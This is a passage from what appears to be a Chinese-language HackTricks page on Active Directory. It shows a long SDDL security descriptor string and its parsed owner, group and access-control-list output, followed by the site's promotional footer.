3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
Owner            : BUILTIN\Administrators
Group            : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl        : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家 网络安全公司 工作吗？你想在 HackTricks 中看到你的 公司广告吗？或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗？请查看 订阅计划！
• 发现我们的独家 NFTs 集合 The PEASS Family
• 获取 官方 PEASS & HackTricks 商品
• 加入 💬 Discord 群组 或 电报群组，或者在 Twitter 上 关注 我 🐦@carlospolopm。
• 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。